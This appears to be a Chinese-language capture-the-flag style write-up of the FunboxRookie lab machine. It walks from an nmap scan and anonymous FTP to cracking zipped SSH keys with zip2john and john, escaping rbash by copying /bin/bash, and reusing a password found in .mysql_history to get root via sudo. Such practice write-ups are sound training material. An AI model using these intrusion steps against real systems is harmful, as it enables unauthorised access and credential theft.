5. FunboxRookie靶机

【offensive-security】5.FunboxRookie靶机

image.png

一、获取靶机信息

1.已知信息：

• IP: 192.168.245.107

2.获取信息：

• nmap扫描开启的服务

┌──(lo0p㉿0xlo0p)-[~]
└─$ nmap -p "*" 192.168.245.107
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-27 10:53 CST
Nmap scan report for 192.168.245.107
Host is up (0.27s latency).
Not shown: 8348 closed tcp ports (conn-refused)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 401.07 seconds

分别开了21、22、80端口，首先进入80端口查看，是一个apache默认页面，没有什么有用的信息

image.png

3.FTP弱密码

使用匿名账号进入ftp，可以发现一堆压缩包，全部下载下来，解压过程中发现需要密码

┌──(lo0p㉿0xlo0p)-[~/ftp_file]
└─$ ftp 192.168.245.107
Connected to 192.168.245.107.
220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.245.107]
Name (192.168.245.107:lo0p): anonymous
331 Anonymous login ok, send your complete email address as your password
Password: 
230-Welcome, archive user [email protected] !
230-
230-The local time is: Thu Oct 27 03:22:03 2022
230-
230-This is an experimental FTP server.  If you have any unusual problems,
230-please report them via e-mail to .
230-
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||47501|)
150 Opening ASCII mode data connection for file list
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 anna.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 ariel.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 bud.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 cathrine.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 homer.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 jessica.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 john.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 marge.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 miriam.zip
-r--r--r--   1 ftp      ftp          1477 Jul 25  2020 tom.zip
-rw-r--r--   1 ftp      ftp           170 Jan 10  2018 welcome.msg
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 zlatan.zip
226 Transfer complete
ftp> quit
221 Goodbye.
┌──(lo0p㉿0xlo0p)-[~/ftp_file]
└─$ unzip -o anna.zip
Archive:  anna.zip
[anna.zip] id_rsa password: 
   skipping: id_rsa                  incorrect password

4.zip2john、john工具爆破压缩包密码

┌──(lo0p㉿0xlo0p)-[~/ftp_file]
└─$ zip2john *.zip > pwd2.txt
ver 2.0 efh 5455 efh 7875 anna.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8
ver 2.0 efh 5455 efh 7875 ariel.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8
ver 2.0 efh 5455 efh 7875 bud.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8
ver 2.0 efh 5455 efh 7875 cathrine.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8
ver 2.0 efh 5455 efh 7875 homer.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8
ver 2.0 efh 5455 efh 7875 jessica.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8
ver 2.0 efh 5455 efh 7875 john.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8
ver 2.0 efh 5455 efh 7875 marge.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8
ver 2.0 efh 5455 efh 7875 miriam.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8
ver 2.0 efh 5455 efh 7875 tom.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8
ver 2.0 efh 5455 efh 7875 zlatan.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8
┌──(lo0p㉿0xlo0p)-[~/ftp_file]
└─$ john pwd2.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
iubire           (tom.zip/id_rsa)     
1g 0:00:00:00 DONE 2/3 (2022-10-27 02:25) 33.33g/s 1563Kp/s 1563Kc/s 1563KC/s 123456..ferrises
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

得到tom的压缩包密码：iubire，解压拿到id_rsa文件，利用该文件免密进入ssh

┌──(lo0p㉿0xlo0p)-[~/ftp_file]
└─$ unzip tom.zip                                  
Archive:  tom.zip
[tom.zip] id_rsa password: 
  inflating: id_rsa
┌──(lo0p㉿0xlo0p)-[~/ftp_file]
└─$ chmod 600 id_rsa
┌──(lo0p㉿0xlo0p)-[~/ftp_file]
└─$ ssh -i id_rsa [email protected]
The authenticity of host '192.168.245.107 (192.168.245.107)' can't be established.
ED25519 key fingerprint is SHA256:ZBER3N78DusT56jsi/IGcAxcCB2W5CZWUJTbc3K4bZc.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.245.107' (ED25519) to the list of known hosts.
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-117-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Oct 27 03:34:44 UTC 2022

  System load:  0.0               Processes:             172
  Usage of /:   74.9% of 4.37GB   Users logged in:       0
  Memory usage: 38%               IP address for ens256: 192.168.245.107
  Swap usage:   0%


30 packages can be updated.
0 updates are security updates.



The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To run a command as administrator (user "root"), use "sudo ".
See "man sudo_root" for details.
tom@funbox2:~$ find / -perm -4000 2>/dev/null
-rbash: /dev/null: restricted: cannot redirect output
tom@funbox2:~$ sudo -l
[sudo] password for tom:
tom@funbox2:~# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
tom:x:1000:1000:tom:/home/tom:/bin/rbash
mysql:x:111:113:MySQL Server,,,:/nonexistent:/bin/false
proftpd:x:112:65534::/run/proftpd:/usr/sbin/nologin
ftp:x:113:65534::/srv/ftp:/usr/sbin/nologin

发现tom用户的shell为rbash，大部分命令都被限制了

5. rbash逃逸

参考： (71条消息) 【渗透测试】--- rbash逃逸方法简述_通地塔的博客-CSDN博客

这里发现cp命令可以执行，我们将/bin/bash复制出来然后执行

tom@funbox2:~$ cp /bin/bash .
tom@funbox2:~$ bash

逃逸了，然后开始获取相关可利用的信息，用户目录下可查看.bash_history等信息

tom@funbox2:~$ ll
total 1148
drwxr-xr-x 5 tom  tom     4096 Oct 27 06:32 ./
drwxr-xr-x 3 root root    4096 Jul 25  2020 ../
-rwxr-xr-x 1 tom  tom  1113504 Oct 27 06:32 bash*
-rw------- 1 tom  tom       72 Oct 27 06:32 .bash_history
-rw-r--r-- 1 tom  tom      220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 tom  tom     3771 Apr  4  2018 .bashrc
drwx------ 2 tom  tom     4096 Oct 27 03:34 .cache/
drwx------ 3 tom  tom     4096 Jul 25  2020 .gnupg/
-rw------- 1 tom  tom    12288 Oct 27 03:36 .local..swp
-rw-r--r-- 1 tom  tom       33 Oct 27 02:49 local.txt
-rw------- 1 tom  tom      295 Jul 25  2020 .mysql_history
-rw-r--r-- 1 tom  tom      807 Apr  4  2018 .profile
drwx------ 2 tom  tom     4096 Jul 25  2020 .ssh/
-rw-r--r-- 1 tom  tom        0 Oct 27 03:41 .sudo_as_admin_successful
-rw------- 1 tom  tom      728 Oct 27 03:40 .viminfo
tom@funbox2:~$ cat .mysql_history 
_HiStOrY_V2_
show\040databases;
quit
create\040database\040'support';
create\040database\040support;
use\040support
create\040table\040users;
show\040tables
;
select\040*\040from\040support
;
show\040tables;
select\040*\040from\040support;
insert\040into\040support\040(tom,\040xx11yy22!);
quit

看到有个.mysql_history很可疑，vim查看有一个insert命令插入tom用户xx11yy22!密码，我们抱着试一试的态度拿这个密码来sudo

tom@funbox2:~$ sudo -l
[sudo] password for tom: 
Matching Defaults entries for tom on funbox2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User tom may run the following commands on funbox2:
    (ALL : ALL) ALL

竟然成功了，权限解析如下：

第一段：表示来源地，即从哪执行这条命令。ALL表示所有计算机
第二段：表示sudo可以切换到什么用户。ALL表示所有用户
第三段：表示sudo可以切换到哪些组下的用户。ALL表示所有组

结果直接su root就可以拿到了root用户权限。。。这题出得太水了

tom@funbox2:~$ sudo su
root@funbox2:/home/tom#